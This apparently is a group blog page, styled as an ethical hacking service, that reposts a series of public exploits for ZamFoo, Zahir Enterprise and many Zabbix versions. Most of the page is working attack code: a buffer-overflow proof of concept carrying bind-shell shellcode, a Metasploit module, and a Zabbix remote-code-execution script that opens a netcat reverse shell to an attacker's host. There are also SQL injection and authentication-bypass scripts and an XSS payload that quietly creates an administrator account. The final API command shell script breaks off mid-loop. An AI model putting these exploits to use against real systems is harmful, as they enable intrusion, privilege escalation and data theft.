source: https://www.securityfocus.com/bid/60826/info
ZamFoo is prone to a remote command-injection vulnerability.
Attackers can exploit this issue to execute arbitrary commands in the context of the application.
ZamFoo 12.0 is vulnerable; other versions may also be affected.
http://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command`
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863118072
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)
# Google Dork: -
# Date: 2018-09-28
# Exploit Author: modpr0be
# Vendor Homepage: http://www.zahiraccounting.com/
# Software Link: http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip
# Version: 6 (build 10b) - Download here: http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip
# Tested on: Windows 7 x86/64bit
# CVE : N/A
# Category: local & privilege escalation
#
# Description
# Vulnerability occurs when the Zahir cannot handle large inputs and anomalies crafted CSV file.
# The Zahir main program failed to process the CR LF (Carriage Return Line Feed) characters which
# caused the Zahir main program to crash.
#
# Credits to f3ci, who found the vulnerability.
#
# Proof of Concept
#!/usr/bin/python
import struct
# msfvenom -p windows/shell_bind_tcp -a x86 -b '\x00\x0a\x0d\x22\x2c' \
# -n 20 -e x86/shikata_ga_nai -f python -v sc
# we won't worry about the space, it's big enough!
# badchars are 00,0a,0d,22,2c
sc = ""
sc += "\x92\x91\xf5\x99\x98\xf5\xd6\x48\x48\x3f\x2f\x99\x4a"
sc += "\x42\x9f\x2f\x42\x43\x43\x42\xb8\x8c\xa3\xb1\xa0\xdd"
sc += "\xc0\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x53\x31\x43\x12"
sc += "\x83\xc3\x04\x03\xcf\xad\x53\x55\x33\x59\x11\x96\xcb"
sc += "\x9a\x76\x1e\x2e\xab\xb6\x44\x3b\x9c\x06\x0e\x69\x11"
sc += "\xec\x42\x99\xa2\x80\x4a\xae\x03\x2e\xad\x81\x94\x03"
sc += "\x8d\x80\x16\x5e\xc2\x62\x26\x91\x17\x63\x6f\xcc\xda"
sc += "\x31\x38\x9a\x49\xa5\x4d\xd6\x51\x4e\x1d\xf6\xd1\xb3"
sc += "\xd6\xf9\xf0\x62\x6c\xa0\xd2\x85\xa1\xd8\x5a\x9d\xa6"
sc += "\xe5\x15\x16\x1c\x91\xa7\xfe\x6c\x5a\x0b\x3f\x41\xa9"
sc += "\x55\x78\x66\x52\x20\x70\x94\xef\x33\x47\xe6\x2b\xb1"
sc += "\x53\x40\xbf\x61\xbf\x70\x6c\xf7\x34\x7e\xd9\x73\x12"
sc += "\x63\xdc\x50\x29\x9f\x55\x57\xfd\x29\x2d\x7c\xd9\x72"
sc += "\xf5\x1d\x78\xdf\x58\x21\x9a\x80\x05\x87\xd1\x2d\x51"
sc += "\xba\xb8\x39\x96\xf7\x42\xba\xb0\x80\x31\x88\x1f\x3b"
sc += "\xdd\xa0\xe8\xe5\x1a\xc6\xc2\x52\xb4\x39\xed\xa2\x9d"
sc += "\xfd\xb9\xf2\xb5\xd4\xc1\x98\x45\xd8\x17\x34\x4d\x7f"
sc += "\xc8\x2b\xb0\x3f\xb8\xeb\x1a\xa8\xd2\xe3\x45\xc8\xdc"
sc += "\x29\xee\x61\x21\xd2\x01\x2e\xac\x34\x4b\xde\xf8\xef"
sc += "\xe3\x1c\xdf\x27\x94\x5f\x35\x10\x32\x17\x5f\xa7\x3d"
sc += "\xa8\x75\x8f\xa9\x23\x9a\x0b\xc8\x33\xb7\x3b\x9d\xa4"
sc += "\x4d\xaa\xec\x55\x51\xe7\x86\xf6\xc0\x6c\x56\x70\xf9"
sc += "\x3a\x01\xd5\xcf\x32\xc7\xcb\x76\xed\xf5\x11\xee\xd6"
sc += "\xbd\xcd\xd3\xd9\x3c\x83\x68\xfe\x2e\x5d\x70\xba\x1a"
sc += "\x31\x27\x14\xf4\xf7\x91\xd6\xae\xa1\x4e\xb1\x26\x37"
sc += "\xbd\x02\x30\x38\xe8\xf4\xdc\x89\x45\x41\xe3\x26\x02"
sc += "\x45\x9c\x5a\xb2\xaa\x77\xdf\xc2\xe0\xd5\x76\x4b\xad"
sc += "\x8c\xca\x16\x4e\x7b\x08\x2f\xcd\x89\xf1\xd4\xcd\xf8"
sc += "\xf4\x91\x49\x11\x85\x8a\x3f\x15\x3a\xaa\x15"
junk = "A" * 3041
junk += '\n\r'
junk += 'A' * 380
junk += "\xeb\x08\x90\x90" # nseh
junk += struct.pack('<L',0x52016661) #seh pop ecx # pop ebp # ret 0x04 (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
junk += '\x90\x90\x90\x90'
junk += sc
junk += "D" * (5000-len(junk))
print """
#===============================================================================#
| ____ __ |
| / __/__ ___ ___ / /____ _______ _ |
| _\ \/ _ \/ -_) _ \/ __/ -_) __/ _ `/ |
| /___/ .__/\__/_//_/\__/\__/_/ \_,_/ |
| /_/ |
| |
| Zahir Enterprise Plus 6 <= build 10b Stack Overflow Vulnerability (0day) |
| CVE-2018-17408 |
| by modpr0be & f3ci (research[at]spentera.com) |
#===============================================================================#
"""
print "[+] Preparing for file.."
f = open('exploit.csv', 'w')
print "[+] Writing exploit code on a CSV file.."
f.write(junk)
f.close()
print "[+] Success writing file.. bring to Mr. Zahir."
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info={})
super(update_info(info,
'Name' => "Zahir Enterprise Plus 6 Stack Buffer Overflow",
'Description' => %q{
This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.
The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters
via Import from other File. This results in overwriting a structured exception handler record.
},
'License' => MSF_LICENSE,
'Author' =>
[
'f3ci', # initial discovery
'modpr0be' # poc and Metasploit Module
],
'References' =>
[
[ 'CVE', '2018-17408' ],
[ 'EDB', '45505' ]
],
'Platform' => 'win',
'Targets' =>
[
['Zahir Enterprise Plus 6 <= build 10b',
{
#P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
'Ret' => 0x52016661,
'Offset' => 3041
}
]
],
'Payload' =>
{
'Space' => 5000,
'BadChars' => "\x00\x0a\x0d\x22\x2c",
'DisableNops' => true
},
'DisclosureDate' => 'Sep 28 2018',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The malicious file name', 'msf.csv'])
])
end
def exploit
buf = rand_text_alpha_upper(target['Offset'])
buf << "\r\n" # crash chars
buf << rand_text_alpha_upper(380) # extra chars to hit the offset
buf << generate_seh_record(target.ret)
buf << payload.encoded
file_create(buf)
end
end
CVE-2016-4338: Zabbix Agent 3.0.1 mysql.size shell command injection
--------------------------------------------------------------------
Affected products
=================
At least Zabbix Agent 1:3.0.1-1+wheezy from
http://repo.zabbix.com/zabbix/3.0/debian is vulnerable. Other versions
were not tested.
Background
==========
"Zabbix agent is deployed on a monitoring target to actively monitor
local resources and applications (hard drives, memory, processor
statistics etc).
The agent gathers operational information locally and reports data to
Zabbix server for further processing. In case of failures (such as a
hard disk running full or a crashed service process), Zabbix server
can actively alert the administrators of the particular machine that
reported the failure.
Zabbix agents are extremely efficient because of use of native system
calls for gathering statistical information."
-- https://www.zabbix.com/documentation/3.0/manual/concepts/agent
Description
===========
Zabbix agent listens on port 10050 for connections from the Zabbix
server. The commands can be built-in or user-defined.
The mysql.size user parameter defined in
/etc/zabbix/zabbix_agentd.d/userparameter_mysql.conf takes three input
parameters and uses a shell script to generate an SQL query:
UserParameter=mysql.size[*],echo "select sum($(case "$3" in both|"") echo "data_length+index_length";; data|index) echo "$3_length";; free) echo "data_free";; esac)) from information_schema.tables$([[ "$1" = "all" || ! "$1" ]] || echo " where table_schema='$1'")$([[ "$2" = "all" || ! "$2" ]] || echo "and table_name='$2'");" | HOME=/var/lib/zabbix mysql -N
The code assumes that /bin/sh is bash that supports the [[ compound
command. However, if /bin/sh is for example dash the statement
[[ "$1" = "all" || ! "$1" ]]
ends up executing the command "$1" with the argument "]]".
Exploit
=======
Zabbix sanitizes the input and blocks many dangerous characters
("\\'\"`*?[]{}~$!&;()<>|#@\n"). Since we cannot use quotes we cannot
give our shell commands any parameters which significantly reduces the
impact of this vulnerability. If you find a way to execute arbitrary
commands using this flaw I'd be really interested in the details. The
following proof-of-concept shows how the vulnerability can be used
escalate privileges locally:
$ echo -en '#!/bin/bash\necho "This code is running as $(id)" 1>&2\n' > /tmp/owned
$ chmod a+rx /tmp/owned
$ echo 'mysql.size[/tmp/owned,all,both]' | nc localhost 10050 | cat -A
ZBXD^AM-^O^@^@^@^@^@^@^@sh: 1: [[: not found$
This code is running as uid=110(zabbix) gid=114(zabbix) groups=114(zabbix)$
sh: 1: [[: not found$
sh: 1: all: not found$
The exploit of course assumes that the Server line in the
configuration includes "127.0.0.1". If the agent is configured to
accept connections only from the Zabbix server. In that case this
issue can only be exploited from the server or by spoofing the IP
address of the server (with for example ARP spoofing).
Since output of the command is piped to mysql it might be possible to
also execute some SQL commands in the database.
Author
======
This issue was discovered by Timo Lindfors from Nixu Corporation.
Timeline
========
2016-04-19: Issue discovered and reported internally for verification.
2016-04-21: Issue reported to vendor.
2016-04-22: Vendor acknowledges vulnerability and starts patching.
2016-04-26: Asked status update from vendor.
2016-04-26: Vendor responds that the issue is still being patched.
2016-04-26: CVE requested from MITRE.
2016-04-28: MITRE assigned CVE-2016-4338 for this vulnerability.
2016-05-02: Vendor published details in the issue tracker https://support.zabbix.com/browse/ZBX-10741
# Exploit Title: Zabbix 7.0.0 - SQL Injection
# Date: 06/12/2024
# Exploit Author: Leandro Dias Barata @m4nb4
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://support.zabbix.com/browse/ZBX-25623
# Version: 6.0.0 - 6.0.31 / 6.0.32rc1 6.4.0 - 6.4.16 / 6.4.17rc1 7.0.0
# Tested on: Kali Linux kali-linux-2024.3
# CVE: CVE-2024-42327
import requests
import argparse
HEADERS = {"Content-Type": "application/json"}
def main():
parser = argparse.ArgumentParser(description="CHECK for CVE-2024-42327")
parser.add_argument("-t", "--target", required=True, help="API URL")
parser.add_argument("-u", "--username", required=True, help="Username")
parser.add_argument("-p", "--password", required=True, help="Password")
args = parser.parse_args()
url = f"{args.target.rstrip('/')}/api_jsonrpc.php"
# Login to get the token
login_data = {
"jsonrpc": "2.0",
"method": "user.login",
"params": {"username": args.username, "password": args.password},
"id": 1,
"auth": None
}
try:
login_response = requests.post(url, json=login_data, headers=HEADERS)
login_response.raise_for_status()
auth_token = login_response.json().get("result")
# Simple SQLi test
data = {
"jsonrpc": "2.0",
"method": "user.get",
"params": {
"selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
"userids": ["1", "2"]
},
"id": 1,
"auth": auth_token
}
test_response = requests.post(url, json=data, headers=HEADERS)
test_response.raise_for_status()
if "error" in test_response.text:
print("[-] NOT VULNERABLE.")
else:
print("[!] VULNERABLE.")
except requests.RequestException as e:
print(f"[!] Request error: {e}")
if __name__ == "__main__":
main()
# Exploit Title: Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)
# Date: 9/3/2022
# Exploit Author: Hussien Misbah
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/rn/rn5.0.17
# Version: 5.0.17
# Tested on: Linux
# Reference: https://github.com/HussienMisbah/tools/tree/master/Zabbix_exploit
#!/usr/bin/python3
# note : this is blind RCE so don't expect to see results on the site
# this exploit is tested against Zabbix 5.0.17 only
import sys
import requests
import re
import random
import string
import colorama
from colorama import Fore
print(Fore.YELLOW+"[*] this exploit is tested against Zabbix 5.0.17 only")
print(Fore.YELLOW+"[*] can reach the author @ https://hussienmisbah.github.io/")
def item_name() :
letters = string.ascii_letters
item = ''.join(random.choice(letters) for i in range(20))
return item
if len(sys.argv) != 6 :
print(Fore.RED +"[!] usage : ./expoit.py <target url> <username> <password> <attacker ip> <attacker port>")
sys.exit(-1)
url = sys.argv[1]
username =sys.argv[2]
password = sys.argv[3]
host = sys.argv[4]
port = sys.argv[5]
s = requests.Session()
headers ={
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
}
data = {
"request":"hosts.php",
"name" : username ,
"password" : password ,
"autologin" :"1" ,
"enter":"Sign+in"
}
proxies = {
'http': 'http://127.0.0.1:8080'
}
r = s.post(url+"/index.php",data=data) #proxies=proxies)
if "Sign out" not in r.text :
print(Fore.RED +"[!] Authentication failed")
sys.exit(-1)
if "Zabbix 5.0.17" not in r.text :
print(Fore.RED +"[!] This is not Zabbix 5.0.17")
sys.exit(-1)
if "filter_hostids%5B0%5D=" in r.text :
try :
x = re.search('filter_hostids%5B0%5D=(.*?)"', r.text)
hostId = x.group(1)
except :
print(Fore.RED +"[!] Exploit failed to resolve HostID")
print(Fore.BLUE +"[?] you can find it under /items then add item")
sys.exit(-1)
else :
print(Fore.RED +"[!] Exploit failed to resolve HostID")
print(Fore.BLUE +"[?] you can find HostID under /items then add item")
sys.exit(-1)
sid= re.search('<meta name="csrf-token" content="(.*)"/>',r.text).group(1) # hidden_csrf_token
command=f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {host} {port} >/tmp/f"
payload = f"system.run[{command},nowait]"
Random_name = item_name()
data2 ={
"sid":sid,"form_refresh":"1","form":"create","hostid":hostId,"selectedInterfaceId":"0","name":Random_name,"type":"0","key":payload,"url":"","query_fields[name][1]":"","query_fields[value][1]":"","timeout":"3s","post_type":"0","posts":"","headers[name][1]":"","headers[value][1]":"","status_codes":"200","follow_redirects":"1","retrieve_mode":"0","http_proxy":"","http_username":"","http_password":"","ssl_cert_file":"","ssl_key_file":"","ssl_key_password":"","interfaceid":"1","params_es":"","params_ap":"","params_f":"","value_type":"3","units":"","delay":"1m","delay_flex[0][type]":"0","delay_flex[0][delay]":"","delay_flex[0][schedule]":"","delay_flex[0][period]":"","history_mode":"1","history":"90d","trends_mode":"1","trends":"365d","valuemapid":"0","new_application":"","applications[]":"0","inventory_link":"0","description":"","status":"0","add":"Add"
}
r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"} )
no_pages= r2.text.count("?page=")
#################################################[Searching in all pages for the uploaded item]#################################################
page = 1
flag=False
while page <= no_pages :
r_page=s.get(url+f"/items.php?page={page}" ,headers=headers )
if Random_name in r_page.text :
print(Fore.GREEN+"[+] the payload has been Uploaded Successfully")
x2 = re.search(rf"(\d+)[^\d]>{Random_name}",r_page.text)
try :
itemId=x2.group(1)
except :
pass
print(Fore.GREEN+f"[+] you should find it at {url}/items.php?form=update&hostid={hostId}&itemid={itemId}")
flag=True
break
else :
page +=1
if flag==False :
print(Fore.BLUE +"[?] do you know you can't upload same key twice ?")
print(Fore.BLUE +"[?] maybe it is already uploaded so set the listener and wait 1m")
print(Fore.BLUE +"[*] change the port and try again")
sys.exit(-1)
#################################################[Executing the item]#################################################
data2["form"] ="update"
data2["selectedInterfaceId"] = "1"
data2["check_now"]="Execute+now"
data2.pop("add",None)
data2["itemid"]=itemId,
print(Fore.GREEN+f"[+] set the listener at {port} please...")
r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"}) # ,proxies=proxies )
print(Fore.BLUE+ "[?] note : it takes up to +1 min so be patient :)")
answer =input(Fore.BLUE+"[+] got a shell ? [y]es/[N]o: ")
if "y" in answer.lower() :
print(Fore.GREEN+"Nice !")
else :
print(Fore.RED+"[!] if you find out why please contact me ")
sys.exit(0)
# Exploit Title: Zabbix 5.0.0 - Stored XSS via URL Widget Iframe
# Date: 8/11/2020
# Exploit Author: Shwetabh Vishnoi
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/download
# Affected Version: Zabbix before 3.0.32rc1, 4.x before 4.0.22rc1, 4.1.x through 4.4.x before 4.4.10rc1, and 5.x before 5.0.2rc1
# CVE : CVE-2020-15803
Affected URL/endpoint(s):
http://192.168.1.7/zabbix.php?sid=f7ca8c8270ce38c7&action=dashboard.widget.check
Affected Param: <iframe src="http://localhost/hello.html" scrolling="auto"
id="iframe" class="widget-url" width="100%" height="100%"></iframe>
Description: The application contains a widget functionality within Global
View Dashboard which can be used by a malicious admin to propagate stored
cross site scripting attack. The “URL” widget iframe does not have any
inbuilt restrictions for the content executing within.
Impact: The malicious webpages within iframes can be used for hosting forms
for Phishing, malware propagation, forced redirections etc.
The affected Global View dashboard is displayed to all the users of the
application, so all the users will be affected with this vulnerability.
Reproduction Steps:
1. Login to the application with Admin
2. In Global View Dashboard, Add a widget
3. Select Type – “URL”, fill any random values for Name, Refresh Interval.
4. Now, in the URL parameter, enter a malicious URL.
5. For demo purpose, I have hosted a web server on my machine and hosted a webpage http://localhost/hello.html. (Alternatively, you can use “ http://14.rs” to display popups.)
6. The malicious webpage containing payload will be executed on the dashboard via iFrame.
7. The executed content can redirect the user to a malicious page (We have used Bing page for redirection).
# Exploit Title: Zabbix 4.4 - Authentication Bypass
# Date: 2019-10-06
# Exploit Author: Todor Donev
# Software Link: https://www.zabbix.com/download
# Version: Zabbix 4.4
# Tested on: Linux Apache/2 PHP/7.2
#
# Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit
#
# Copyright 2019 (c) Todor Donev
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# # [ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Initializing the browser
# # [ >>> Referer =>
# # [ >>> User-Agent => Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1
# # [ >>> Content-Type => application/x-www-form-urlencoded
# # [ <<< Cache-Control => no-store, no-cache, must-revalidate
# # [ <<< Connection => close
# # [ <<< Date => Mon, 07 Oct 2019 12:29:54 GMT
# # [ <<< Pragma => no-cache
# # [ <<< Server => nginx
# # [ <<< Vary => Accept-Encoding
# # [ <<< Content-Type => text/html; charset=UTF-8
# # [ <<< Expires => Thu, 19 Nov 1981 08:52:00 GMT
# # [ <<< Client-Date => Mon, 07 Oct 2019 12:29:54 GMT
# # [ <<< Client-Peer =>
# # [ <<< Client-Response-Num => 1
# # [ <<< Client-SSL-Cert-Issuer =>
# # [ <<< Client-SSL-Cert-Subject =>
# # [ <<< Client-SSL-Cipher => ECDHE-RSA-AES128-GCM-SHA256
# # [ <<< Client-SSL-Socket-Class => IO::Socket::SSL
# # [ <<< Client-SSL-Warning => Peer certificate not verified
# # [ <<< Client-Transfer-Encoding => chunked
# # [ <<< Link => <favicon.ico>; rel="icon"<assets/img/apple-touch-icon-76x76-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="76x76"<assets/img/apple-touch-icon-120x120-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="120x120"<assets/img/apple-touch-icon-152x152-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="152x152"<assets/img/apple-touch-icon-180x180-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="180x180"<assets/img/touch-icon-192x192.png>; rel="icon"; sizes="192x192"<assets/styles/dark-theme.css>; rel="stylesheet"; type="text/css"
# # [ <<< Set-Cookie => zbx_sessionid=e125efe43b1f67b0fdbfb4db2fa1ce0d; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnly
# # [ <<< Strict-Transport-Security => max-age=63072000; includeSubdomains; preload
# # [ <<< Title => TARGET: Dashboard
# # [ <<< X-Content-Type-Options => nosniff
# # [ <<< X-Frame-Options => SAMEORIGIN
# # [ <<< X-Meta-Author => Zabbix SIA
# # [ <<< X-Meta-Charset => utf-8
# # [ <<< X-Meta-Csrf-Token => fdbfb4db2fa1ce0d
# # [ <<< X-Meta-Msapplication-Config => none
# # [ <<< X-Meta-Msapplication-TileColor => #d40000
# # [ <<< X-Meta-Msapplication-TileImage => assets/img/ms-tile-144x144.png
# # [ <<< X-Meta-Viewport => width=device-width, initial-scale=1
# # [ <<< X-UA-Compatible => IE=Edge
# # [ <<< X-XSS-Protection => 1; mode=block
# # [
# # [ The target is vulnerable. Try to open these links:
# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view
# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1
# # [ https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1
# # [ https://TARGET/zabbix/overview.php?ddreset=1
# # [ https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1
# # [ https://TARGET/zabbix/latest.php?ddreset=1
# # [ https://TARGET/zabbix/charts.php?ddreset=1
# # [ https://TARGET/zabbix/screens.php?ddreset=1
# # [ https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1
# # [ https://TARGET/zabbix/srv_status.php?ddreset=1
# # [ https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1
# # [ https://TARGET/zabbix/hostinventories.php?ddreset=1
# # [ https://TARGET/zabbix/report2.php?ddreset=1
# # [ https://TARGET/zabbix/toptriggers.php?ddreset=1
# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.list
# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1
#
#!/usr/bin/perl -w
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
my $host = shift || ''; # Full path url to the store
$host =~ s|/$||;
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
print "[ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit\n";
print "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
my $target = $host."\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request);
print "[ >>> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print "[ <<< $_ => ", $response->header($_), "\n" for $response->header_field_names;
print "[ Exploit failed! 401 Unauthorized!\n" and exit if ($response->code eq '401');
print "[ Exploit failed! 403 Forbidden!\n" and exit if ($response->code eq '403');
if (defined ($response->as_string()) && ($response->as_string() =~ m/Dashboard/)){
print "[\n[ The target is vulnerable. Try to open these links:\n";
my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
my @files = $tree->look_down(_tag => 'a');
for my $line (@files){
next if ($line->attr('href') =~ m/javascript/);
next if ($line->attr('href') =~ m/\#/);
next if ($line->attr('href') =~ m/http/);
print "[ ", $host."/zabbix/".$line->attr('href'), "\n";
}
} else {
print "[ Exploit failed! The target isn't vulnerable\n";
exit;
}
# Exploit Title: Zabbix 4.2 - Authentication Bypass
# Date: 2019-10-06
# Exploit Author: Milad Khoshdel
# Software Link: https://www.zabbix.com/download
# Version: Zabbix [2.x , 3.x , 4.x] Tested on latest version Zabbix 4.2
# Tested on: Linux Apache/2 PHP/7.2
# Google Dork: inurl:zabbix/zabbix.php
=========
Vulnerable Page:
=========
/zabbix.php?action=dashboard.view&dashboardid=1
=========
POC:
=========
Attacker can bypass login page and access to dashboard page and create [Dashboard/Report/Screen/Map] without any Username/Password and anonymously.
All Created elements [Dashboard/Report/Screen/Map] is accessible by other users and admin.
REGUEST -->
GET /zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1
Host: [HOST-IP]
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
RESPONSE -->
HTTP/1.1 200 OK
Date: Sun, 06 Oct 2019 11:40:18 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: zbx_sessionid=a8d192ec833bd4476e0f6a550e6e5bed; HttpOnly
Set-Cookie: PHPSESSID=i2j8kt08m7dp3ojstqeaod9joo; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=i2j8kt08m7dp3ojstqeaod9joo; path=/; HttpOnly
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 19239
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html>
[Dashboard Page Content Will Load Here]
</html>
# Exploit Title: Zabbix 3.4.7 - Stored XSS
# Date: 30-03-2021
# Exploit Author: Radmil Gazizov
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/rn/rn3.4.7
# Version: 3.4.7
# Tested on: Linux
# Reference -
https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt
1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)
2- Create new dashboard
3- Add a new widget => Type: Map nabigation tree
4- Past into parameter "Name": <img src="x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});">
5- Click to "Add" button
==========================================
Title: Zabbix 3.0.3 SQL Injection Vulnerability
Product: Zabbix
Vulnerable Version(s): 2.2.x, 3.0.x
Fixed Version: 3.0.4
Homepage: http://www.zabbix.com
Patch link: https://support.zabbix.com/browse/ZBX-11023
Credit: 1N3@CrowdShield
==========================================
Vendor Description:
=====================
Zabbix is an open source availability and performance monitoring solution.
Vulnerability Overview:
=====================
Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the toggle_ids array in the latest.php page.
Business Impact:
=====================
By exploiting this SQL injection vulnerability, an authenticated attacker (or guest user) is able to gain full access to the database. This would allow an attacker to escalate their privileges to a power user, compromise the database, or execute commands on the underlying database operating system.
Because of the functionalities Zabbix offers, an attacker with admin privileges (depending on the configuration) can execute arbitrary OS commands on the configured Zabbix hosts and server. This results in a severe impact to the monitored infrastructure.
Although the attacker needs to be authenticated in general, the system could also be at risk if the adversary has no user account. Zabbix offers a guest mode which provides a low privileged default account for users without password. If this guest mode is enabled, the SQL injection vulnerability can be exploited unauthenticated.
Proof of Concept:
=====================
latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
Result:
SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1)
latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185
Disclosure Timeline:
=====================
7/18/2016 - Reported vulnerability to Zabbix
7/21/2016 - Zabbix responded with permission to file CVE and to disclose after a patch is made public
7/22/2016 - Zabbix released patch for vulnerability
8/3/2016 - CVE details submitted
8/11/2016 - Vulnerability details disclosed
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: Zabbix RCE with API JSON-RPC
# Date: 06-06-2016
# Exploit Author: Alexander Gurin
# Vendor Homepage: http://www.zabbix.com
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3
# Tested on: Linux (Debian, CentOS)
# CVE : N/A
import requests
import json
import readline
ZABIX_ROOT = 'http://192.168.66.2' ### Zabbix IP-address
url = ZABIX_ROOT + '/api_jsonrpc.php' ### Don't edit
login = 'Admin' ### Zabbix login
password = 'zabbix' ### Zabbix password
hostid = '10084' ### Zabbix hostid
### auth
payload = {
"jsonrpc" : "2.0",
"method" : "user.login",
"params": {
'user': ""+login+"",
'password': ""+password+"",
},
"auth" : None,
"id" : 0,
}
headers = {
'content-type': 'application/json',
}
auth = requests.post(url, data=json.dumps(payload), headers=(headers))
auth = auth.json()
while True:
cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ')
if cmd == "" : print "Result of last command:"
if cmd == "quit" : break
